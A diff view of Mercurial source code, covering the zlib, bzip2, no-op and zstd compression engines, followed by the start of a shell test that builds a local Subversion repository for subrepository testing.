3198 raise error.Abort(_('compression engine %s could not be loaded') %
3199 raise error.Abort(_('compression engine %s could not be loaded') %
3199 engine.name())
3200 engine.name())
3200 return engine
3201 return engine
3201
3202
3202 def forbundletype(self, bundletype):
3203 def forbundletype(self, bundletype):
3203 """Obtain a compression engine registered to a bundle type.
3204 """Obtain a compression engine registered to a bundle type.
3204
3205
3205 Will raise KeyError if the bundle type isn't registered.
3206 Will raise KeyError if the bundle type isn't registered.
3206
3207
3207 Will abort if the engine is known but not available.
3208 Will abort if the engine is known but not available.
3208 """
3209 """
3209 engine = self._engines[self._bundletypes[bundletype]]
3210 engine = self._engines[self._bundletypes[bundletype]]
3210 if not engine.available():
3211 if not engine.available():
3211 raise error.Abort(_('compression engine %s could not be loaded') %
3212 raise error.Abort(_('compression engine %s could not be loaded') %
3212 engine.name())
3213 engine.name())
3213 return engine
3214 return engine
3214
3215
3215 def supportedwireengines(self, role, onlyavailable=True):
3216 def supportedwireengines(self, role, onlyavailable=True):
3216 """Obtain compression engines that support the wire protocol.
3217 """Obtain compression engines that support the wire protocol.
3217
3218
3218 Returns a list of engines in prioritized order, most desired first.
3219 Returns a list of engines in prioritized order, most desired first.
3219
3220
3220 If ``onlyavailable`` is set, filter out engines that can't be
3221 If ``onlyavailable`` is set, filter out engines that can't be
3221 loaded.
3222 loaded.
3222 """
3223 """
3223 assert role in (SERVERROLE, CLIENTROLE)
3224 assert role in (SERVERROLE, CLIENTROLE)
3224
3225
3225 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3226 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3226
3227
3227 engines = [self._engines[e] for e in self._wiretypes.values()]
3228 engines = [self._engines[e] for e in self._wiretypes.values()]
3228 if onlyavailable:
3229 if onlyavailable:
3229 engines = [e for e in engines if e.available()]
3230 engines = [e for e in engines if e.available()]
3230
3231
3231 def getkey(e):
3232 def getkey(e):
3232 # Sort first by priority, highest first. In case of tie, sort
3233 # Sort first by priority, highest first. In case of tie, sort
3233 # alphabetically. This is arbitrary, but ensures output is
3234 # alphabetically. This is arbitrary, but ensures output is
3234 # stable.
3235 # stable.
3235 w = e.wireprotosupport()
3236 w = e.wireprotosupport()
3236 return -1 * getattr(w, attr), w.name
3237 return -1 * getattr(w, attr), w.name
3237
3238
3238 return list(sorted(engines, key=getkey))
3239 return list(sorted(engines, key=getkey))
3239
3240
3240 def forwiretype(self, wiretype):
3241 def forwiretype(self, wiretype):
3241 engine = self._engines[self._wiretypes[wiretype]]
3242 engine = self._engines[self._wiretypes[wiretype]]
3242 if not engine.available():
3243 if not engine.available():
3243 raise error.Abort(_('compression engine %s could not be loaded') %
3244 raise error.Abort(_('compression engine %s could not be loaded') %
3244 engine.name())
3245 engine.name())
3245 return engine
3246 return engine
3246
3247
3247 def forrevlogheader(self, header):
3248 def forrevlogheader(self, header):
3248 """Obtain a compression engine registered to a revlog header.
3249 """Obtain a compression engine registered to a revlog header.
3249
3250
3250 Will raise KeyError if the revlog header value isn't registered.
3251 Will raise KeyError if the revlog header value isn't registered.
3251 """
3252 """
3252 return self._engines[self._revlogheaders[header]]
3253 return self._engines[self._revlogheaders[header]]
3253
3254
3254 compengines = compressormanager()
3255 compengines = compressormanager()
3255
3256
3256 class compressionengine(object):
3257 class compressionengine(object):
3257 """Base class for compression engines.
3258 """Base class for compression engines.
3258
3259
3259 Compression engines must implement the interface defined by this class.
3260 Compression engines must implement the interface defined by this class.
3260 """
3261 """
3261 def name(self):
3262 def name(self):
3262 """Returns the name of the compression engine.
3263 """Returns the name of the compression engine.
3263
3264
3264 This is the key the engine is registered under.
3265 This is the key the engine is registered under.
3265
3266
3266 This method must be implemented.
3267 This method must be implemented.
3267 """
3268 """
3268 raise NotImplementedError()
3269 raise NotImplementedError()
3269
3270
3270 def available(self):
3271 def available(self):
3271 """Whether the compression engine is available.
3272 """Whether the compression engine is available.
3272
3273
3273 The intent of this method is to allow optional compression engines
3274 The intent of this method is to allow optional compression engines
3274 that may not be available in all installations (such as engines relying
3275 that may not be available in all installations (such as engines relying
3275 on C extensions that may not be present).
3276 on C extensions that may not be present).
3276 """
3277 """
3277 return True
3278 return True
3278
3279
3279 def bundletype(self):
3280 def bundletype(self):
3280 """Describes bundle identifiers for this engine.
3281 """Describes bundle identifiers for this engine.
3281
3282
3282 If this compression engine isn't supported for bundles, returns None.
3283 If this compression engine isn't supported for bundles, returns None.
3283
3284
3284 If this engine can be used for bundles, returns a 2-tuple of strings of
3285 If this engine can be used for bundles, returns a 2-tuple of strings of
3285 the user-facing "bundle spec" compression name and an internal
3286 the user-facing "bundle spec" compression name and an internal
3286 identifier used to denote the compression format within bundles. To
3287 identifier used to denote the compression format within bundles. To
3287 exclude the name from external usage, set the first element to ``None``.
3288 exclude the name from external usage, set the first element to ``None``.
3288
3289
3289 If bundle compression is supported, the class must also implement
3290 If bundle compression is supported, the class must also implement
3290 ``compressstream`` and `decompressorreader``.
3291 ``compressstream`` and `decompressorreader``.
3291
3292
3292 The docstring of this method is used in the help system to tell users
3293 The docstring of this method is used in the help system to tell users
3293 about this engine.
3294 about this engine.
3294 """
3295 """
3295 return None
3296 return None
3296
3297
3297 def wireprotosupport(self):
3298 def wireprotosupport(self):
3298 """Declare support for this compression format on the wire protocol.
3299 """Declare support for this compression format on the wire protocol.
3299
3300
3300 If this compression engine isn't supported for compressing wire
3301 If this compression engine isn't supported for compressing wire
3301 protocol payloads, returns None.
3302 protocol payloads, returns None.
3302
3303
3303 Otherwise, returns ``compenginewireprotosupport`` with the following
3304 Otherwise, returns ``compenginewireprotosupport`` with the following
3304 fields:
3305 fields:
3305
3306
3306 * String format identifier
3307 * String format identifier
3307 * Integer priority for the server
3308 * Integer priority for the server
3308 * Integer priority for the client
3309 * Integer priority for the client
3309
3310
3310 The integer priorities are used to order the advertisement of format
3311 The integer priorities are used to order the advertisement of format
3311 support by server and client. The highest integer is advertised
3312 support by server and client. The highest integer is advertised
3312 first. Integers with non-positive values aren't advertised.
3313 first. Integers with non-positive values aren't advertised.
3313
3314
3314 The priority values are somewhat arbitrary and only used for default
3315 The priority values are somewhat arbitrary and only used for default
3315 ordering. The relative order can be changed via config options.
3316 ordering. The relative order can be changed via config options.
3316
3317
3317 If wire protocol compression is supported, the class must also implement
3318 If wire protocol compression is supported, the class must also implement
3318 ``compressstream`` and ``decompressorreader``.
3319 ``compressstream`` and ``decompressorreader``.
3319 """
3320 """
3320 return None
3321 return None
3321
3322
3322 def revlogheader(self):
3323 def revlogheader(self):
3323 """Header added to revlog chunks that identifies this engine.
3324 """Header added to revlog chunks that identifies this engine.
3324
3325
3325 If this engine can be used to compress revlogs, this method should
3326 If this engine can be used to compress revlogs, this method should
3326 return the bytes used to identify chunks compressed with this engine.
3327 return the bytes used to identify chunks compressed with this engine.
3327 Else, the method should return ``None`` to indicate it does not
3328 Else, the method should return ``None`` to indicate it does not
3328 participate in revlog compression.
3329 participate in revlog compression.
3329 """
3330 """
3330 return None
3331 return None
3331
3332
3332 def compressstream(self, it, opts=None):
3333 def compressstream(self, it, opts=None):
3333 """Compress an iterator of chunks.
3334 """Compress an iterator of chunks.
3334
3335
3335 The method receives an iterator (ideally a generator) of chunks of
3336 The method receives an iterator (ideally a generator) of chunks of
3336 bytes to be compressed. It returns an iterator (ideally a generator)
3337 bytes to be compressed. It returns an iterator (ideally a generator)
3337 of bytes of chunks representing the compressed output.
3338 of bytes of chunks representing the compressed output.
3338
3339
3339 Optionally accepts an argument defining how to perform compression.
3340 Optionally accepts an argument defining how to perform compression.
3340 Each engine treats this argument differently.
3341 Each engine treats this argument differently.
3341 """
3342 """
3342 raise NotImplementedError()
3343 raise NotImplementedError()
3343
3344
3344 def decompressorreader(self, fh):
3345 def decompressorreader(self, fh):
3345 """Perform decompression on a file object.
3346 """Perform decompression on a file object.
3346
3347
3347 Argument is an object with a ``read(size)`` method that returns
3348 Argument is an object with a ``read(size)`` method that returns
3348 compressed data. Return value is an object with a ``read(size)`` that
3349 compressed data. Return value is an object with a ``read(size)`` that
3349 returns uncompressed data.
3350 returns uncompressed data.
3350 """
3351 """
3351 raise NotImplementedError()
3352 raise NotImplementedError()
3352
3353
3353 def revlogcompressor(self, opts=None):
3354 def revlogcompressor(self, opts=None):
3354 """Obtain an object that can be used to compress revlog entries.
3355 """Obtain an object that can be used to compress revlog entries.
3355
3356
3356 The object has a ``compress(data)`` method that compresses binary
3357 The object has a ``compress(data)`` method that compresses binary
3357 data. This method returns compressed binary data or ``None`` if
3358 data. This method returns compressed binary data or ``None`` if
3358 the data could not be compressed (too small, not compressible, etc).
3359 the data could not be compressed (too small, not compressible, etc).
3359 The returned data should have a header uniquely identifying this
3360 The returned data should have a header uniquely identifying this
3360 compression format so decompression can be routed to this engine.
3361 compression format so decompression can be routed to this engine.
3361 This header should be identified by the ``revlogheader()`` return
3362 This header should be identified by the ``revlogheader()`` return
3362 value.
3363 value.
3363
3364
3364 The object has a ``decompress(data)`` method that decompresses
3365 The object has a ``decompress(data)`` method that decompresses
3365 data. The method will only be called if ``data`` begins with
3366 data. The method will only be called if ``data`` begins with
3366 ``revlogheader()``. The method should return the raw, uncompressed
3367 ``revlogheader()``. The method should return the raw, uncompressed
3367 data or raise a ``RevlogError``.
3368 data or raise a ``RevlogError``.
3368
3369
3369 The object is reusable but is not thread safe.
3370 The object is reusable but is not thread safe.
3370 """
3371 """
3371 raise NotImplementedError()
3372 raise NotImplementedError()
3372
3373
3373 class _zlibengine(compressionengine):
3374 class _zlibengine(compressionengine):
3374 def name(self):
3375 def name(self):
3375 return 'zlib'
3376 return 'zlib'
3376
3377
3377 def bundletype(self):
3378 def bundletype(self):
3378 """zlib compression using the DEFLATE algorithm.
3379 """zlib compression using the DEFLATE algorithm.
3379
3380
3380 All Mercurial clients should support this format. The compression
3381 All Mercurial clients should support this format. The compression
3381 algorithm strikes a reasonable balance between compression ratio
3382 algorithm strikes a reasonable balance between compression ratio
3382 and size.
3383 and size.
3383 """
3384 """
3384 return 'gzip', 'GZ'
3385 return 'gzip', 'GZ'
3385
3386
3386 def wireprotosupport(self):
3387 def wireprotosupport(self):
3387 return compewireprotosupport('zlib', 20, 20)
3388 return compewireprotosupport('zlib', 20, 20)
3388
3389
3389 def revlogheader(self):
3390 def revlogheader(self):
3390 return 'x'
3391 return 'x'
3391
3392
3392 def compressstream(self, it, opts=None):
3393 def compressstream(self, it, opts=None):
3393 opts = opts or {}
3394 opts = opts or {}
3394
3395
3395 z = zlib.compressobj(opts.get('level', -1))
3396 z = zlib.compressobj(opts.get('level', -1))
3396 for chunk in it:
3397 for chunk in it:
3397 data = z.compress(chunk)
3398 data = z.compress(chunk)
3398 # Not all calls to compress emit data. It is cheaper to inspect
3399 # Not all calls to compress emit data. It is cheaper to inspect
3399 # here than to feed empty chunks through generator.
3400 # here than to feed empty chunks through generator.
3400 if data:
3401 if data:
3401 yield data
3402 yield data
3402
3403
3403 yield z.flush()
3404 yield z.flush()
3404
3405
3405 def decompressorreader(self, fh):
3406 def decompressorreader(self, fh):
3406 def gen():
3407 def gen():
3407 d = zlib.decompressobj()
3408 d = zlib.decompressobj()
3408 for chunk in filechunkiter(fh):
3409 for chunk in filechunkiter(fh):
3409 while chunk:
3410 while chunk:
3410 # Limit output size to limit memory.
3411 # Limit output size to limit memory.
3411 yield d.decompress(chunk, 2 ** 18)
3412 yield d.decompress(chunk, 2 ** 18)
3412 chunk = d.unconsumed_tail
3413 chunk = d.unconsumed_tail
3413
3414
3414 return chunkbuffer(gen())
3415 return chunkbuffer(gen())
3415
3416
3416 class zlibrevlogcompressor(object):
3417 class zlibrevlogcompressor(object):
3417 def compress(self, data):
3418 def compress(self, data):
3418 insize = len(data)
3419 insize = len(data)
3419 # Caller handles empty input case.
3420 # Caller handles empty input case.
3420 assert insize > 0
3421 assert insize > 0
3421
3422
3422 if insize < 44:
3423 if insize < 44:
3423 return None
3424 return None
3424
3425
3425 elif insize <= 1000000:
3426 elif insize <= 1000000:
3426 compressed = zlib.compress(data)
3427 compressed = zlib.compress(data)
3427 if len(compressed) < insize:
3428 if len(compressed) < insize:
3428 return compressed
3429 return compressed
3429 return None
3430 return None
3430
3431
3431 # zlib makes an internal copy of the input buffer, doubling
3432 # zlib makes an internal copy of the input buffer, doubling
3432 # memory usage for large inputs. So do streaming compression
3433 # memory usage for large inputs. So do streaming compression
3433 # on large inputs.
3434 # on large inputs.
3434 else:
3435 else:
3435 z = zlib.compressobj()
3436 z = zlib.compressobj()
3436 parts = []
3437 parts = []
3437 pos = 0
3438 pos = 0
3438 while pos < insize:
3439 while pos < insize:
3439 pos2 = pos + 2**20
3440 pos2 = pos + 2**20
3440 parts.append(z.compress(data[pos:pos2]))
3441 parts.append(z.compress(data[pos:pos2]))
3441 pos = pos2
3442 pos = pos2
3442 parts.append(z.flush())
3443 parts.append(z.flush())
3443
3444
3444 if sum(map(len, parts)) < insize:
3445 if sum(map(len, parts)) < insize:
3445 return ''.join(parts)
3446 return ''.join(parts)
3446 return None
3447 return None
3447
3448
3448 def decompress(self, data):
3449 def decompress(self, data):
3449 try:
3450 try:
3450 return zlib.decompress(data)
3451 return zlib.decompress(data)
3451 except zlib.error as e:
3452 except zlib.error as e:
3452 raise error.RevlogError(_('revlog decompress error: %s') %
3453 raise error.RevlogError(_('revlog decompress error: %s') %
3453 str(e))
3454 str(e))
3454
3455
3455 def revlogcompressor(self, opts=None):
3456 def revlogcompressor(self, opts=None):
3456 return self.zlibrevlogcompressor()
3457 return self.zlibrevlogcompressor()
3457
3458
3458 compengines.register(_zlibengine())
3459 compengines.register(_zlibengine())
3459
3460
3460 class _bz2engine(compressionengine):
3461 class _bz2engine(compressionengine):
3461 def name(self):
3462 def name(self):
3462 return 'bz2'
3463 return 'bz2'
3463
3464
3464 def bundletype(self):
3465 def bundletype(self):
3465 """An algorithm that produces smaller bundles than ``gzip``.
3466 """An algorithm that produces smaller bundles than ``gzip``.
3466
3467
3467 All Mercurial clients should support this format.
3468 All Mercurial clients should support this format.
3468
3469
3469 This engine will likely produce smaller bundles than ``gzip`` but
3470 This engine will likely produce smaller bundles than ``gzip`` but
3470 will be significantly slower, both during compression and
3471 will be significantly slower, both during compression and
3471 decompression.
3472 decompression.
3472
3473
3473 If available, the ``zstd`` engine can yield similar or better
3474 If available, the ``zstd`` engine can yield similar or better
3474 compression at much higher speeds.
3475 compression at much higher speeds.
3475 """
3476 """
3476 return 'bzip2', 'BZ'
3477 return 'bzip2', 'BZ'
3477
3478
3478 # We declare a protocol name but don't advertise by default because
3479 # We declare a protocol name but don't advertise by default because
3479 # it is slow.
3480 # it is slow.
3480 def wireprotosupport(self):
3481 def wireprotosupport(self):
3481 return compewireprotosupport('bzip2', 0, 0)
3482 return compewireprotosupport('bzip2', 0, 0)
3482
3483
3483 def compressstream(self, it, opts=None):
3484 def compressstream(self, it, opts=None):
3484 opts = opts or {}
3485 opts = opts or {}
3485 z = bz2.BZ2Compressor(opts.get('level', 9))
3486 z = bz2.BZ2Compressor(opts.get('level', 9))
3486 for chunk in it:
3487 for chunk in it:
3487 data = z.compress(chunk)
3488 data = z.compress(chunk)
3488 if data:
3489 if data:
3489 yield data
3490 yield data
3490
3491
3491 yield z.flush()
3492 yield z.flush()
3492
3493
3493 def decompressorreader(self, fh):
3494 def decompressorreader(self, fh):
3494 def gen():
3495 def gen():
3495 d = bz2.BZ2Decompressor()
3496 d = bz2.BZ2Decompressor()
3496 for chunk in filechunkiter(fh):
3497 for chunk in filechunkiter(fh):
3497 yield d.decompress(chunk)
3498 yield d.decompress(chunk)
3498
3499
3499 return chunkbuffer(gen())
3500 return chunkbuffer(gen())
3500
3501
3501 compengines.register(_bz2engine())
3502 compengines.register(_bz2engine())
3502
3503
3503 class _truncatedbz2engine(compressionengine):
3504 class _truncatedbz2engine(compressionengine):
3504 def name(self):
3505 def name(self):
3505 return 'bz2truncated'
3506 return 'bz2truncated'
3506
3507
3507 def bundletype(self):
3508 def bundletype(self):
3508 return None, '_truncatedBZ'
3509 return None, '_truncatedBZ'
3509
3510
3510 # We don't implement compressstream because it is hackily handled elsewhere.
3511 # We don't implement compressstream because it is hackily handled elsewhere.
3511
3512
3512 def decompressorreader(self, fh):
3513 def decompressorreader(self, fh):
3513 def gen():
3514 def gen():
3514 # The input stream doesn't have the 'BZ' header. So add it back.
3515 # The input stream doesn't have the 'BZ' header. So add it back.
3515 d = bz2.BZ2Decompressor()
3516 d = bz2.BZ2Decompressor()
3516 d.decompress('BZ')
3517 d.decompress('BZ')
3517 for chunk in filechunkiter(fh):
3518 for chunk in filechunkiter(fh):
3518 yield d.decompress(chunk)
3519 yield d.decompress(chunk)
3519
3520
3520 return chunkbuffer(gen())
3521 return chunkbuffer(gen())
3521
3522
3522 compengines.register(_truncatedbz2engine())
3523 compengines.register(_truncatedbz2engine())
3523
3524
3524 class _noopengine(compressionengine):
3525 class _noopengine(compressionengine):
3525 def name(self):
3526 def name(self):
3526 return 'none'
3527 return 'none'
3527
3528
3528 def bundletype(self):
3529 def bundletype(self):
3529 """No compression is performed.
3530 """No compression is performed.
3530
3531
3531 Use this compression engine to explicitly disable compression.
3532 Use this compression engine to explicitly disable compression.
3532 """
3533 """
3533 return 'none', 'UN'
3534 return 'none', 'UN'
3534
3535
3535 # Clients always support uncompressed payloads. Servers don't because
3536 # Clients always support uncompressed payloads. Servers don't because
3536 # unless you are on a fast network, uncompressed payloads can easily
3537 # unless you are on a fast network, uncompressed payloads can easily
3537 # saturate your network pipe.
3538 # saturate your network pipe.
3538 def wireprotosupport(self):
3539 def wireprotosupport(self):
3539 return compewireprotosupport('none', 0, 10)
3540 return compewireprotosupport('none', 0, 10)
3540
3541
3541 # We don't implement revlogheader because it is handled specially
3542 # We don't implement revlogheader because it is handled specially
3542 # in the revlog class.
3543 # in the revlog class.
3543
3544
3544 def compressstream(self, it, opts=None):
3545 def compressstream(self, it, opts=None):
3545 return it
3546 return it
3546
3547
3547 def decompressorreader(self, fh):
3548 def decompressorreader(self, fh):
3548 return fh
3549 return fh
3549
3550
3550 class nooprevlogcompressor(object):
3551 class nooprevlogcompressor(object):
3551 def compress(self, data):
3552 def compress(self, data):
3552 return None
3553 return None
3553
3554
3554 def revlogcompressor(self, opts=None):
3555 def revlogcompressor(self, opts=None):
3555 return self.nooprevlogcompressor()
3556 return self.nooprevlogcompressor()
3556
3557
3557 compengines.register(_noopengine())
3558 compengines.register(_noopengine())
3558
3559
3559 class _zstdengine(compressionengine):
3560 class _zstdengine(compressionengine):
3560 def name(self):
3561 def name(self):
3561 return 'zstd'
3562 return 'zstd'
3562
3563
3563 @propertycache
3564 @propertycache
3564 def _module(self):
3565 def _module(self):
3565 # Not all installs have the zstd module available. So defer importing
3566 # Not all installs have the zstd module available. So defer importing
3566 # until first access.
3567 # until first access.
3567 try:
3568 try:
3568 from . import zstd
3569 from . import zstd
3569 # Force delayed import.
3570 # Force delayed import.
3570 zstd.__version__
3571 zstd.__version__
3571 return zstd
3572 return zstd
3572 except ImportError:
3573 except ImportError:
3573 return None
3574 return None
3574
3575
3575 def available(self):
3576 def available(self):
3576 return bool(self._module)
3577 return bool(self._module)
3577
3578
3578 def bundletype(self):
3579 def bundletype(self):
3579 """A modern compression algorithm that is fast and highly flexible.
3580 """A modern compression algorithm that is fast and highly flexible.
3580
3581
3581 Only supported by Mercurial 4.1 and newer clients.
3582 Only supported by Mercurial 4.1 and newer clients.
3582
3583
3583 With the default settings, zstd compression is both faster and yields
3584 With the default settings, zstd compression is both faster and yields
3584 better compression than ``gzip``. It also frequently yields better
3585 better compression than ``gzip``. It also frequently yields better
3585 compression than ``bzip2`` while operating at much higher speeds.
3586 compression than ``bzip2`` while operating at much higher speeds.
3586
3587
3587 If this engine is available and backwards compatibility is not a
3588 If this engine is available and backwards compatibility is not a
3588 concern, it is likely the best available engine.
3589 concern, it is likely the best available engine.
3589 """
3590 """
3590 return 'zstd', 'ZS'
3591 return 'zstd', 'ZS'
3591
3592
3592 def wireprotosupport(self):
3593 def wireprotosupport(self):
3593 return compewireprotosupport('zstd', 50, 50)
3594 return compewireprotosupport('zstd', 50, 50)
3594
3595
3595 def revlogheader(self):
3596 def revlogheader(self):
3596 return '\x28'
3597 return '\x28'
3597
3598
3598 def compressstream(self, it, opts=None):
3599 def compressstream(self, it, opts=None):
3599 opts = opts or {}
3600 opts = opts or {}
3600 # zstd level 3 is almost always significantly faster than zlib
3601 # zstd level 3 is almost always significantly faster than zlib
3601 # while providing no worse compression. It strikes a good balance
3602 # while providing no worse compression. It strikes a good balance
3602 # between speed and compression.
3603 # between speed and compression.
3603 level = opts.get('level', 3)
3604 level = opts.get('level', 3)
3604
3605
3605 zstd = self._module
3606 zstd = self._module
3606 z = zstd.ZstdCompressor(level=level).compressobj()
3607 z = zstd.ZstdCompressor(level=level).compressobj()
3607 for chunk in it:
3608 for chunk in it:
3608 data = z.compress(chunk)
3609 data = z.compress(chunk)
3609 if data:
3610 if data:
3610 yield data
3611 yield data
3611
3612
3612 yield z.flush()
3613 yield z.flush()
3613
3614
3614 def decompressorreader(self, fh):
3615 def decompressorreader(self, fh):
3615 zstd = self._module
3616 zstd = self._module
3616 dctx = zstd.ZstdDecompressor()
3617 dctx = zstd.ZstdDecompressor()
3617 return chunkbuffer(dctx.read_from(fh))
3618 return chunkbuffer(dctx.read_from(fh))
3618
3619
3619 class zstdrevlogcompressor(object):
3620 class zstdrevlogcompressor(object):
3620 def __init__(self, zstd, level=3):
3621 def __init__(self, zstd, level=3):
3621 # Writing the content size adds a few bytes to the output. However,
3622 # Writing the content size adds a few bytes to the output. However,
3622 # it allows decompression to be more optimal since we can
3623 # it allows decompression to be more optimal since we can
3623 # pre-allocate a buffer to hold the result.
3624 # pre-allocate a buffer to hold the result.
3624 self._cctx = zstd.ZstdCompressor(level=level,
3625 self._cctx = zstd.ZstdCompressor(level=level,
3625 write_content_size=True)
3626 write_content_size=True)
3626 self._dctx = zstd.ZstdDecompressor()
3627 self._dctx = zstd.ZstdDecompressor()
3627 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3628 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3628 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3629 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3629
3630
3630 def compress(self, data):
3631 def compress(self, data):
3631 insize = len(data)
3632 insize = len(data)
3632 # Caller handles empty input case.
3633 # Caller handles empty input case.
3633 assert insize > 0
3634 assert insize > 0
3634
3635
3635 if insize < 50:
3636 if insize < 50:
3636 return None
3637 return None
3637
3638
3638 elif insize <= 1000000:
3639 elif insize <= 1000000:
3639 compressed = self._cctx.compress(data)
3640 compressed = self._cctx.compress(data)
3640 if len(compressed) < insize:
3641 if len(compressed) < insize:
3641 return compressed
3642 return compressed
3642 return None
3643 return None
3643 else:
3644 else:
3644 z = self._cctx.compressobj()
3645 z = self._cctx.compressobj()
3645 chunks = []
3646 chunks = []
3646 pos = 0
3647 pos = 0
3647 while pos < insize:
3648 while pos < insize:
3648 pos2 = pos + self._compinsize
3649 pos2 = pos + self._compinsize
3649 chunk = z.compress(data[pos:pos2])
3650 chunk = z.compress(data[pos:pos2])
3650 if chunk:
3651 if chunk:
3651 chunks.append(chunk)
3652 chunks.append(chunk)
3652 pos = pos2
3653 pos = pos2
3653 chunks.append(z.flush())
3654 chunks.append(z.flush())
3654
3655
3655 if sum(map(len, chunks)) < insize:
3656 if sum(map(len, chunks)) < insize:
3656 return ''.join(chunks)
3657 return ''.join(chunks)
3657 return None
3658 return None
3658
3659
3659 def decompress(self, data):
3660 def decompress(self, data):
3660 insize = len(data)
3661 insize = len(data)
3661
3662
3662 try:
3663 try:
3663 # This was measured to be faster than other streaming
3664 # This was measured to be faster than other streaming
3664 # decompressors.
3665 # decompressors.
3665 dobj = self._dctx.decompressobj()
3666 dobj = self._dctx.decompressobj()
3666 chunks = []
3667 chunks = []
3667 pos = 0
3668 pos = 0
3668 while pos < insize:
3669 while pos < insize:
3669 pos2 = pos + self._decompinsize
3670 pos2 = pos + self._decompinsize
3670 chunk = dobj.decompress(data[pos:pos2])
3671 chunk = dobj.decompress(data[pos:pos2])
3671 if chunk:
3672 if chunk:
3672 chunks.append(chunk)
3673 chunks.append(chunk)
3673 pos = pos2
3674 pos = pos2
3674 # Frame should be exhausted, so no finish() API.
3675 # Frame should be exhausted, so no finish() API.
3675
3676
3676 return ''.join(chunks)
3677 return ''.join(chunks)
3677 except Exception as e:
3678 except Exception as e:
3678 raise error.RevlogError(_('revlog decompress error: %s') %
3679 raise error.RevlogError(_('revlog decompress error: %s') %
3679 str(e))
3680 str(e))
3680
3681
3681 def revlogcompressor(self, opts=None):
3682 def revlogcompressor(self, opts=None):
3682 opts = opts or {}
3683 opts = opts or {}
3683 return self.zstdrevlogcompressor(self._module,
3684 return self.zstdrevlogcompressor(self._module,
3684 level=opts.get('level', 3))
3685 level=opts.get('level', 3))
3685
3686
3686 compengines.register(_zstdengine())
3687 compengines.register(_zstdengine())
3687
3688
3688 def bundlecompressiontopics():
3689 def bundlecompressiontopics():
3689 """Obtains a list of available bundle compressions for use in help."""
3690 """Obtains a list of available bundle compressions for use in help."""
3690 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3691 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3691 items = {}
3692 items = {}
3692
3693
3693 # We need to format the docstring. So use a dummy object/type to hold it
3694 # We need to format the docstring. So use a dummy object/type to hold it
3694 # rather than mutating the original.
3695 # rather than mutating the original.
3695 class docobject(object):
3696 class docobject(object):
3696 pass
3697 pass
3697
3698
3698 for name in compengines:
3699 for name in compengines:
3699 engine = compengines[name]
3700 engine = compengines[name]
3700
3701
3701 if not engine.available():
3702 if not engine.available():
3702 continue
3703 continue
3703
3704
3704 bt = engine.bundletype()
3705 bt = engine.bundletype()
3705 if not bt or not bt[0]:
3706 if not bt or not bt[0]:
3706 continue
3707 continue
3707
3708
3708 doc = pycompat.sysstr('``%s``\n %s') % (
3709 doc = pycompat.sysstr('``%s``\n %s') % (
3709 bt[0], engine.bundletype.__doc__)
3710 bt[0], engine.bundletype.__doc__)
3710
3711
3711 value = docobject()
3712 value = docobject()
3712 value.__doc__ = doc
3713 value.__doc__ = doc
3713
3714
3714 items[bt[0]] = value
3715 items[bt[0]] = value
3715
3716
3716 return items
3717 return items
3717
3718
3718 # convenient shortcut
3719 # convenient shortcut
3719 dst = debugstacktrace
3720 dst = debugstacktrace
@@ -1,641 +1,705 b''
1 #require svn15
1 #require svn15
2
2
3 $ SVNREPOPATH=`pwd`/svn-repo
3 $ SVNREPOPATH=`pwd`/svn-repo
4 #if windows
4 #if windows
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
6 #else
6 #else
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
8 #endif
8 #endif
9
9
10 $ filter_svn_output () {
10 $ filter_svn_output () {
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
12 > }
12 > }
13
13
14 create subversion repo
14 create subversion repo
15
15
16 $ WCROOT="`pwd`/svn-wc"
16 $ WCROOT="`pwd`/svn-wc"
17 $ svnadmin create svn-repo
17 $ svnadmin create svn-repo
18 $ svn co "$SVNREPOURL" svn-wc
18 $ svn co "$SVNREPOURL" svn-wc
19 Checked out revision 0.
19 Checked out revision 0.
20 $ cd svn-wc
20 $ cd svn-wc
21 $ mkdir src
21 $ mkdir src
22 $ echo alpha > src/alpha
22 $ echo alpha > src/alpha
23 $ svn add src
23 $ svn add src
24 A src
24 A src
25 A src/alpha (glob)
25 A src/alpha (glob)
26 $ mkdir externals
26 $ mkdir externals
27 $ echo other > externals/other
27 $ echo other > externals/other
28 $ svn add externals
28 $ svn add externals
29 A externals
29 A externals
30 A externals/other (glob)
30 A externals/other (glob)
31 $ svn ci -qm 'Add alpha'
31 $ svn ci -qm 'Add alpha'
32 $ svn up -q
32 $ svn up -q
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
34 $ svn propset -F extdef svn:externals src
34 $ svn propset -F extdef svn:externals src
35 property 'svn:externals' set on 'src'
35 property 'svn:externals' set on 'src'
36 $ svn ci -qm 'Setting externals'
36 $ svn ci -qm 'Setting externals'
37 $ cd ..
37 $ cd ..
38
38
39 create hg repo
39 create hg repo
40
40
41 $ mkdir sub
41 $ mkdir sub
42 $ cd sub
42 $ cd sub
43 $ hg init t
43 $ hg init t
44 $ cd t
44 $ cd t
45
45
46 first revision, no sub
46 first revision, no sub
47
47
48 $ echo a > a
48 $ echo a > a
49 $ hg ci -Am0
49 $ hg ci -Am0
50 adding a
50 adding a
51
51
52 add first svn sub with leading whitespaces
52 add first svn sub with leading whitespaces
53
53
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
56 $ svn co --quiet "$SVNREPOURL"/src s
